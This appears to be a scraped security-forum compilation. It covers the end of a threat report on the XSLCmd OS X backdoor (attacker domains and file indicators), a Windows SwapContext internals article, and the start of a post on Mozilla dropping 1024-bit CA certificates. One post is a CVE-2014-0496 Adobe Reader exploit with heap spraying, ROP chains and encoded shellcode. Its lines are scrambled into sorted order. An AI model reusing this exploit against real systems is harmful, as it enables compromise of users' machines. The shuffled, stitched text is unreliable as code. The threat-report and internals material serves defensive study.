kocrmicrosoft[.]com             cooweb51[@]hotmail.com
microsoft.org[.]tw              cooweb51[@]hotmail.com
microsoftdomainadmin[.]com      cooweb51[@]hotmail.com
microsoftsp3[.]com              cooweb51[@]hotmail.com
playncs[.]com                   cooweb51[@]hotmail.com
softwareupdatevmware[.]com      cooweb51[@]hotmail.com
windowsnine[.]net               cooweb51[@]hotmail.com
cdngoogle[.]com                 metasploit3[@]google.com
cisco-inc[.]net                 metasploit3[@]google.com
mremote[.]biz                   metasploit3[@]google.com
officescan[.]biz                metasploit3[@]google.com
oprea[.]biz                     metasploit3[@]google.com
battle.com[.]tw                 6g8wkx[@]gmail.com
diablo-iii[.]mobi               6g8wkx[@]gmail.com
microsoftupdate[.]ws            6g8wkx[@]gmail.com
msftncsl[.]com                  6g8wkx[@]gmail.com
square-enix[.]us                6g8wkx[@]gmail.com
updatamicrosoft[.]com           6g8wkx[@]gmail.com
powershell.com[.]tw             6g8wkx[@]gmail.com
gefacebook[.]com                6g8wkx[@]gmail.com
attoo1s[.]com                   6g8wkx[@]gmail.com
msnupdate[.]bz                  skydrive1951[@]hotmail.com
googlemapsoftware[.]com         skydrive1951[@]hotmail.com

XSLCmd Usage

For the majority of the time we've been tracking them, XSLCmd has been the "go-to" backdoor for GREF, as shown by the wide range of compile dates for the Windows samples we have: from 2009-01-05 to 2013-08-01. Appendix 2 provides a partial list of Windows sample hashes and configuration metadata.

Since Mach-O binaries do not have a compile timestamp like Windows executables, we can only infer from other data when the OS X variant was developed. As mentioned above, the "FakeDomain" was configured as "www.appleupdate[.]biz", which was originally registered on August 2, 2012; the registration appears to have been updated on August 7, 2014, but the registrant is still the same "cast west". When we found the sample on August 10, the domain did not resolve, and there were no historical records for appleupdate[.]biz in any of the passive DNS (pDNS) sources we checked. In the intervening weeks it has been seen by pDNS sensors, with the first query occurring on August 12, 2014 (which could be related to our research, since the hits are 'nxdomain'), and then on August 16, 2014 there are pDNS records pointing to 61.128.110.38, which you'll notice is the same IP the OS X version was configured to use. This could hint at the possibility that this OS X port of XSLCmd was recently developed and deployed; however, this remains uncertain.

Other Backdoor Usage

In addition to XSLCmd, GREF has utilized a number of other backdoors over time.
Another backdoor unique to them, which we call "ddrh", is a limited-feature backdoor that was frequently dropped in the SWC attacks in 2010 but has not been seen much since. Another historical backdoor attributed to GREF is one known as ERACS or Trojan.LURKER (not to be confused with the LURK0 variant of Gh0st). This full-featured backdoor includes the usual backdoor functionality, including support for additional modules, but it also includes a USB monitoring capability that generates a directory listing of USB-connected devices.

We have also observed GREF using a handful of other common backdoors, including Poison Ivy, Gh0st, 9002/HOMEUNIX, HKDoor, and Briba, but these occurrences have been pretty rare. All of the GREF 9002/HOMEUNIX samples in our repository have compile dates from 2009 or 2010. Interestingly enough, there is some overlap with a cluster detailed in a report we released in November of last year, specifically the "AllShell" cluster (C2: smtp.allshell[.]net).

Starting in mid-2012, GREF began using the Kaba/SOGU backdoor. These early samples, which were discussed in great detail by LastLine in their blog post "An Analysis of PlugX," are usually bundled into a RAR self-extracting executable and use the three-part loading mechanism consisting of an executable, the malicious DLL that is side-loaded, and the shellcode file. In mid-2013, GREF switched to using a new Kaba/SOGU builder that created binaries with unique metadata. For example, many of these samples create a mutex of "PST-2.0" when executed, and some have the shared "HT Applications" version metadata.
Conclusion

The "A" in APT is generally used to describe the threat actors as "Advanced", but as this blog shows, they are also "Adaptable." Not only have they adopted new Windows-based backdoors over time; as Apple's OS X platform has increased in popularity in many companies, they have logically adapted their toolset to match, in order to gain and maintain a persistent foothold in the organizations they are targeting.

OS X has gained popularity across enterprises, from less savvy users who find it easy to operate, to highly technical users who utilize its more powerful features, as well as with executives. Many people also consider it to be a more secure computing platform, which may lead to a dangerous sense of complacency in both IT departments and with users. In fact, while the security industry has started offering more products for OS X systems, these systems are sometimes less regulated and monitored in corporate environments than their Windows peers. Clearly, as the OS X platform becomes more widely adopted across enterprises, threat groups like GREF will continue to adapt and find ways to exploit that platform.

Credit to Jay Smith for his initial analysis of the Windows version of the XSLCmd backdoor and Joshua Homan for his assistance in this research.
Appendix 1: XSLCmd for OS X created files

Filename                                                                     Purpose
$HOME/Library/LaunchAgents/clipboardd                                        executable
/Library/Logs/clipboardd                                                     executable when run as super user
$HOME/Library/LaunchAgents/com.apple.service.clipboardd.plist                plist for persistence
$HOME/.fontset/pxupdate.ini                                                  configuration file
$HOME/.fontset/chkdiska.dat                                                  additional configuration file
$HOME/.fontset/chkdiskc.dat                                                  additional configuration file
$HOME/Library/Logs/BackupData/<year><month><day>_<hr>_<min>_<sec>_keys.log   key log file

Sursa: Forced to Adapt: XSLCmd Backdoor Now on OS X | FireEye Blog
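The file paths in Appendix 1 double as host-based indicators. A minimal sketch of a check for them on an OS X system follows; the path list comes straight from the table above, and the only assumptions are the run-time expansion of $HOME and checking the BackupData parent directory in place of the timestamped key log name:

```python
import os

# File paths created by the OS X XSLCmd variant, per Appendix 1.
# $HOME is expanded at run time; the key log filename is a timestamp
# pattern, so its parent directory is checked instead.
XSLCMD_PATHS = [
    "~/Library/LaunchAgents/clipboardd",
    "/Library/Logs/clipboardd",
    "~/Library/LaunchAgents/com.apple.service.clipboardd.plist",
    "~/.fontset/pxupdate.ini",
    "~/.fontset/chkdiska.dat",
    "~/.fontset/chkdiskc.dat",
    "~/Library/Logs/BackupData",   # directory holding the *_keys.log files
]

def xslcmd_indicators(exists=os.path.exists):
    """Return the expanded indicator paths present on this host."""
    found = []
    for p in XSLCMD_PATHS:
        full = os.path.expanduser(p)
        if exists(full):
            found.append(full)
    return found

if __name__ == "__main__":
    hits = xslcmd_indicators()
    print("possible XSLCmd artifacts:" if hits else "no XSLCmd artifacts found", hits)
```

The `exists` parameter is injectable only so the check can be exercised without touching the filesystem; by default it uses `os.path.exists`.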
14. Windows Internals - A look into SwapContext routine

Hi, here I am really taking advantage of my summer vacation and back again with a second part of the Windows thread scheduling articles. In the previous blog post I discussed the internals of quantum-end context switching (a flowchart). However, the routine responsible for the context switch itself wasn't discussed in detail, and that's why I'm here today.

Here are some notes that'll help us through this post:

1 - The routine which contains the code that performs the context switch is SwapContext, and it's called internally by KiSwapContext. Some routines prefer to call SwapContext directly and do the housekeeping that KiSwapContext does themselves.

2 - The routines above (KiSwapContext and SwapContext) are involved in ALL context switches that are performed, no matter what the reason for the context switch is (preemption, wait state, termination, ...).

3 - SwapContext is originally written in assembly and it doesn't have any prologue or epilogue that are normally seen in ordinary conventions; imagine it like a naked function.

4 - Neither SwapContext nor KiSwapContext is responsible for setting the CurrentThread and NextThread fields of the current KPRCB. It is the responsibility of the caller to store the new thread's KTHREAD pointer into pPrcb->CurrentThread and queue the current thread (we're still running in its context) in the ready queue before calling KiSwapContext or SwapContext, which will actually perform the context switch. Usually, before calling KiSwapContext, the old IRQL (before raising it to DISPATCH_LEVEL) is stored in CurrentThread->WaitIrql, but there's an exception discussed later in this article.

So buckle up and let's get started. Before digging through SwapContext, let's first examine what its callers supply to it as arguments. SwapContext expects the following arguments:

- ESI : (PKTHREAD) A pointer to the new thread's structure.
- EDI : (PKTHREAD) A pointer to the old thread's structure.
- EBX : (PKPCR) A pointer to the PCR (Processor Control Region) structure of the current processor.
- ECX : (KIRQL) The IRQL at which the thread was running before raising it to DISPATCH_LEVEL.

By callers, I mean the KiSwapContext routine and some routines that call SwapContext directly (ex: KiDispatchInterrupt). Let's start by seeing what's happening inside KiSwapContext.

This routine expects 2 arguments, the current thread's and new thread's KTHREAD pointers, in ECX and EDX respectively (__fastcall). Before storing both arguments in EDI and ESI, it first proceeds to save these and other registers on the current thread's (old thread soon) stack:

EBP : The stack frame base pointer (SwapContext only updates ESP).
EDI : The caller might be using EDI for something else, save it.
ESI : The caller might be using ESI for something else, save it too.
EBX : The caller might be using EBX for something else, save it too.

Note that these registers will be popped from this same thread's stack when the context is switched from another thread back to this thread at a later time (when it is rescheduled to run). After pushing the registers, KiSwapContext stores the self pointer to the PCR in EBX (fs:[1Ch]). Then it stores the CurrentThread->WaitIrql value in ECX; now that everything is set up, KiSwapContext is ready to call SwapContext.

Again, before going through SwapContext, let me talk about the routines that call SwapContext directly, specifically the KiDispatchInterrupt routine that was referenced in my previous post. Why doesn't KiDispatchInterrupt call KiSwapContext? Simply because it only needs to push EBP, EDI and ESI onto the current thread's stack, as it already uses EBX as a pointer to the PCR. Here we can see a great advantage of software context switching: we save only the registers that we really need to save, not all registers.

Now we can get to SwapContext and explain what it does in detail.
The return type of SwapContext is a boolean value that tells the caller (in the new thread's stack) whether the new thread has any APCs to deliver or not. Let's see what SwapContext does in these 15 steps:

1 - The first thing that SwapContext does is verify that the new thread isn't actually running; this only matters on a multiprocessor system, where another processor might actually be running the thread. If the new thread is running, SwapContext just loops until the thread stops running. The boolean value checked is NewThread->Running, and after getting out of the loop, the Running boolean is immediately set to TRUE.

2 - The next thing SwapContext does is push the IRQL value supplied in ECX. To spoil a bit of what's coming in the next steps (step 13), SwapContext itself pops ECX later, but after the context switch. As a result, we'll be popping the new thread's pushed IRQL value (stack switched).

3 - Interrupts are disabled, and the PRCB cycle time fields are updated with the value of the time-stamp counter. After the update, interrupts are enabled again.

4 - The count of context switches in the PCR is incremented (Pcr->ContextSwitches++;), and Pcr->Used_ExceptionList, which is the first element of the PCR (fs:[0]), is pushed. fs:[0] is actually a pointer to the last registered exception handling frame, which contains a pointer to the next frame and also a pointer to the handling routine (similar to usermode); simply a singly linked list. Saving the exception list is important, as each thread has its own stack and thus its own exception handling list.

5 - OldThread->NpxState is tested; if it's non-NULL, SwapContext proceeds to save the floating-point registers and FPU-related data using the fxsave instruction.
The location where this data is saved is in the initial stack, exactly at (initial stack pointer - 528 bytes). The fxsave output is 512 bytes long, so it's like pushing 512 bytes onto the initial stack; the other 16 bytes are for stack alignment, I suppose. The initial stack is discussed later during step 8.

6 - Stack swapping: save the stack pointer in OldThread->KernelStack and load NewThread->KernelStack into ESP. We're now running on the new thread's stack; from now on, every value that we pop was pushed the last time the new thread was preparing for a context switch.

7 - Virtual address space swapping: the old thread's process is compared with the new thread's process; if they're different, the CR3 register (page directory pointer table register) is updated with the value of NewThread->ApcState.Process->DirectoryTableBase. As a result, the new thread will have access to a valid virtual address space. If the process is the same, CR3 is kept unchanged. The local descriptor table is also changed if the threads' processes are different.

8 - TSS Esp0 switching: even though I'll dedicate a future post to discussing the TSS (task state segment) in detail under Windows, a brief explanation is needed here. Windows only uses one TSS per processor and uses only the ESP0 and SS0 fields (another field is also used, but it is out of the scope of this article), which stand for the kernel stack pointer and the kernel stack segment respectively. When a usermode-to-kernelmode transition must be done as a result of an interrupt, exception or system service call, as part of the transition ESP must be changed to point to the kernel stack; this kernel stack pointer is taken from the TSS's ESP0 field. Logically speaking, the ESP0 field of the TSS must be changed on every context switch to the kernel stack pointer of the new thread.
In order to do so, SwapContext takes the kernel stack pointer at NewThread->InitialStack (InitialStack = StackBase - 0x30), subtracts the space that it used to save the floating-point registers with the fxsave instruction plus the additional 16 bytes for stack alignment, and then stores the resulting stack pointer in the TSS's Esp0 field: pPcr->TssCopy.Esp0 (the TSS can also be accessed using the TR segment register).

9 - We've completed the context switch now, and the old thread can finally be marked as "stopped running" by setting the previously discussed Running boolean to FALSE: OldThread->Running = FALSE.

10 - If fxsave was previously executed by the new thread (the last time its context was switched out), the data (floating-point registers, etc.) saved by it is loaded again using the fxrstor instruction.

11 - Next, the TEB (thread environment block) pointer is updated in the PCR: pPcr->Used_Self = NewThread->Teb. So the Used_Self field of the PCR always points to the current thread's TEB.

12 - The new thread's context switch count is incremented (NewThread->ContextSwitches++).

13 - It's finally time to pop the 2 values that SwapContext pushed: the pointer to the exception list and the IRQL, from the new thread's stack. The saved IRQL value is restored into ECX, and the exception list pointer is popped into its field in the PCR.

14 - A check is done to see if the context switch was performed from a DPC routine (entering a wait state, for example), which is prohibited. If the pPrcb->DpcRoutineActive boolean is TRUE, this means that the current processor is currently executing a DPC routine, and SwapContext will immediately call KeBugCheck, which will show a BSOD: ATTEMPTED_SWITCH_FROM_DPC.

15 - This is the step where the IRQL value (NewThread->WaitIrql) stored in ECX comes into use. As mentioned earlier, SwapContext returns a boolean value telling the caller whether it has to deliver any pending APCs.
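The stack arithmetic in steps 5 and 8 can be made concrete. Here is a small worked example using only the constants quoted above (InitialStack = StackBase - 0x30, 512 bytes of fxsave output, 16 alignment bytes); the stack base value used is purely hypothetical:

```python
FXSAVE_AREA = 512   # size of the fxsave output block (step 5)
ALIGN_PAD   = 16    # extra bytes kept for 16-byte stack alignment

def initial_stack(stack_base):
    # Per the article: InitialStack = StackBase - 0x30 on this build.
    return stack_base - 0x30

def tss_esp0(stack_base):
    # Step 8: Esp0 = InitialStack minus the fxsave save area and padding,
    # i.e. 528 bytes below the initial stack pointer.
    return initial_stack(stack_base) - FXSAVE_AREA - ALIGN_PAD

base = 0x9A000000                 # hypothetical kernel stack base
print(hex(initial_stack(base)))   # 0x99ffffd0
print(hex(tss_esp0(base)))        # 0x99fffdc0
```

The 528-byte gap between InitialStack and Esp0 is exactly the "(initial stack pointer - 528 bytes)" location mentioned in step 5.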
During this step, SwapContext checks the new thread's ApcState to see if there are any kernel APCs pending. If there are, a second check is performed to see if special kernel APCs are disabled. If they're not disabled, ECX is tested: if it is equal to PASSIVE_LEVEL, the function returns TRUE; if it is above PASSIVE_LEVEL, an APC_LEVEL software interrupt is requested and the function returns FALSE. So the only case in which SwapContext returns TRUE is when ECX is equal to PASSIVE_LEVEL, in which case the caller will proceed to lower the IRQL to APC_LEVEL first to call KiDeliverApc, and then lower it to PASSIVE_LEVEL afterwards.

Special case:

This special case is actually about the IRQL value supplied to SwapContext in ECX. The nature of this value depends on whether the caller will lower the IRQL immediately upon returning from SwapContext or not. Let's take 2 examples: the KiExitDispatcher and KiQuantumEnd routines (KiQuantumEnd is the special case).

If you disassemble KiExitDispatcher, you'll notice that before calling KiSwapContext it stores the OldIrql (before it was raised to DISPATCH_LEVEL) in the WaitIrql of the old thread, so that when the thread gains execution again at a later time, SwapContext can decide whether there are any APCs to deliver or not. KiExitDispatcher makes use of the return value of KiSwapContext (KiSwapContext returns the same value returned by SwapContext) to lower the IRQL (see step 15's last sentence).

However, by disassembling KiQuantumEnd you'll see that it stores APC_LEVEL in the old thread's WaitIrql without even caring about the IRQL at which the thread was running before.
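The step 15 decision, including why a stored WaitIrql of APC_LEVEL forces a FALSE return, can be summarized in a short model. This is a simplified sketch with stand-in boolean parameters, not the real KTHREAD/ApcState fields:

```python
# Toy model of SwapContext's step 15 return-value logic.
PASSIVE_LEVEL = 0
APC_LEVEL = 1

def swap_context_returns(kernel_apc_pending, special_apcs_disabled, wait_irql):
    """Return (result, requested_interrupt).

    result True means the caller must lower the IRQL and deliver APCs
    itself; a requested interrupt of APC_LEVEL means delivery is deferred
    to the software-interrupt path instead.
    """
    if not kernel_apc_pending or special_apcs_disabled:
        return False, None
    if wait_irql == PASSIVE_LEVEL:
        return True, None          # the only case where SwapContext returns TRUE
    return False, APC_LEVEL        # above PASSIVE_LEVEL: request an APC_LEVEL interrupt

# KiQuantumEnd always supplies APC_LEVEL, so the result is always FALSE,
# though an APC_LEVEL software interrupt may still be requested:
print(swap_context_returns(True, False, APC_LEVEL))
```

Note how the model also captures the remark below about KiQuantumEnd: pending APCs still trigger a software interrupt request even though the function itself returns FALSE.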
If you refer back to the flowchart in my previous article, you'll see that KiQuantumEnd always ensures that SwapContext returns FALSE. First of all, KiQuantumEnd is called as a result of calling KiDispatchInterrupt, which is meant to be called when a DISPATCH_LEVEL software interrupt was requested. Thus, KiDispatchInterrupt was called by HalpDispatchSoftwareInterrupt, which is normally called by HalpCheckForSoftwareInterrupt. HalpDispatchSoftwareInterrupt is the function responsible for raising the IRQL to the software interrupt level (APC_LEVEL or DISPATCH_LEVEL), and upon returning from it, HalpCheckForSoftwareInterrupt restores the IRQL to its original value (OldIrql). So the reason KiQuantumEnd doesn't care about KiSwapContext's return value is that it won't proceed to lower the IRQL (not its responsibility) nor to deliver any APCs; that's why it supplies APC_LEVEL as the old IRQL value to SwapContext, so that SwapContext will return FALSE. However, a software interrupt might still be requested by SwapContext if there are any pending APCs. KiDispatchInterrupt, which calls SwapContext directly, uses the same approach as KiQuantumEnd; instead of storing the value in OldThread->WaitIrql, it just moves it into ECX.

Post notes:
- Based on Windows 7 32-bit :>
- For any questions or suggestions feel free to leave a comment below or send me an email: souhail.hammou@outlook.com

See you again soon,
Souhail

Sursa: Reverse Engineering 0x4 Fun: Windows Internals - A look into SwapContext routine
  15. [h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h] @PhysicalDrive0 }); 1 0 obj 2 0 obj 3 0 obj 4 0 obj 5 0 obj 6 0 obj 7 0 obj aaa += aaa; aa=dd13.split("%u"); aa[i]=str12+aa[i]; /AcroForm 6 0 R addButtonFunc = function () { af1="aaaaa%aaaaaaaauaaaaaa"; af1=af1[("112","a2s1","replace")](/a/g,''); app.addToolButton({ app.addToolButton({ app.alert('123'); app.removeToolButton({ as1211(); bbb += aaa; bbb = bbb.substring(0, i11 / 2); bbb += sa; bbb += str; break; ccc += ccc; cEnable: "addButtonFunc();" cEnable: "removeButtonFunc();" cExec: "1", cExec: "1", cName: "evil" cName: "evil", cName: "xxx", </config> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> /Count 1 dd13=aa.join('%u'); dd13=af1+dd13; dd13=xx13.join('%u'); } else { } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { endobj endstream for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141"); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); for (i = 0; i < aa[tt1]; i++) for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141"); function as1211() function heapSpray(str, str_addr, r_addr) { function opp12(xx13) heapSpray(payload, ret_addr, r_addr); if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { if(ccc[tt] >= (0x40000*2)) if(j) if (!r11) { if (vulnerable) { j=4-aa[i][tt1]; /Kids [3 0 R] <</Length 10074>> <</Length 372>> obj_size = 0x330 + 0x1c; obj_size = 0x360 + 0x1c; obj_size = 0x370; /OpenAction 4 0 R /Pages 2 0 R <pageSet></pageSet> /Parent 2 0 R part1 += rop_addr; %%%%%PDF-6.5 PE/%%%%%% <present><pdf><interactive>1</interactive></pdf></present> r11 = true; r_addr = 0x08a8; r_addr = 0x08e4; r_addr = 0x08e8; removeButtonFunc = function () { ret_addr = this[un12]("%u8003%u4a84"); ret_addr = this[un12]("%ua83e%u4a82"); ret_addr = this[un12]("%ua8df%u4a82"); return; return 
dd13; rop_addr = this[un12]("%u08a8%u0c0c"); rop_addr = this[un12]("%u08e4%u0c0c"); rop_addr = this[un12]("%u08e8%u0c0c"); rop = rop10; rop = rop11; rop = rop9; <</Size 8/Root 1 0 R>> str12=new Array(j+1).join("0"); stream <subform name="form1" layout="tb" locale="en_US"> </subform></template></xdp:xdp> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> trailer tt1=tt1[("112","a2s1","replace")](/a/g,''); tt=tt[("112","a2s1","replace")](/a/g,''); /tYPE/aCTION/S/JavaScript/JS 5 0 R>> /type /Page /Type /Page /Type /Pages un12=''; un12=un12[("112","as1","replace")](/w/g,''); un12="uwnwwewwwswcwwwawwpwe"; var aaa = this[un12]("%u0c0c"); var arr = new Array(); var bbb = aaa.substring(0, i1 / 2); var ccc = bbb.substring(0, i2 / 2); var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); var executable = ""; var i11 = 0x0c0c - 0x24; var i1 = r_addr - 0x24; var i2 = 0x4000 + 0xc000; var i3 = (0x1020 - 0x08) / 2; var obj_size; var part1 = ""; var part2 = ""; var part2_len = obj_size - part1[tt1] * 2; var payload = rop + shellcode; var r11 = false; var r_addr; var ret_addr; var rop; var rop10 = this[("123","1a1",un12)](opp12(xx132)); var rop11 = this[("123","1a1",un12)](opp12(xx131)); var rop9 = this[("123","1a1",un12)](opp12(xx133)); var rop_addr; var sa = str_addr; var shellcode = this[("123","1a1",un12)](opp12(xx134)); var tt1="alaaeaanaaagataaah"; var tt="alaaeaanaagataah"; var vulnerable = true; var xx131=new 
Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16)); var xx132=new 
Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16)); var xx133=new 
Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16)); var xx134=new 
Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toStrin
g(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16)); vulnerable = false; while (1) while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa; while (sa[tt] < (xxx - r_addr)) sa += sa; x11=9; <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <</XFA 7 0 R>> <?xml version="1.0" encoding="UTF-8"?> xxx=0x0c0c; Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com
  16. The company is very large and serious, not some small back-room outfit. I recommend it to those with experience.
  17. Not bad. Make a video.
  18. 107,000 web sites no longer trusted by Mozilla
Posted by jnickel in Project Sonar on Sep 4, 2014 3:48:43 PM

Mozilla's Firefox and Thunderbird recently removed 1024-bit certificate authority (CA) certificates from their trusted store. This change was announced to the various certificate authorities in May of this year and shipped with Firefox 32 on September 2nd. It was a long time coming: the National Institute of Standards and Technology (NIST) recommended that 1024-bit RSA keys be deprecated in 2010 and disallowed after 2013. A blog post at http://kuix.de/blog provided a list of the specific certificates that are no longer trusted as of Firefox 32.

There is little disagreement that 1024-bit RSA keys may be cracked today by adversaries with the resources of nation states. As technology marches on, the security of 1024-bit keys will continue to deteriorate and become accessible to operators of relatively small clusters of commodity hardware. In the case of a CA key, successfully factoring the RSA primes would allow an adversary to sign any certificate just as the CA in question would. This would allow impersonation of any "secure" web site, so long as the software you use still trusts these keys.

This is certainly a welcome change, but how many sites are affected by the removal of these CA certificates, and how many of those sites have certificates that aren't due to expire anytime soon? Fortunately there is a means to answer these questions. In June of 2012, the University of Michigan began scanning the Internet and collecting SSL certificates from all sites that responded on port 443. At Rapid7, we started our own collection of certificates in September of 2013 as part of Project Sonar, and have been conducting weekly scans since. Both sets of scans record the entire certificate chain, including the intermediate CA keys that Mozilla recently removed from the trusted store.

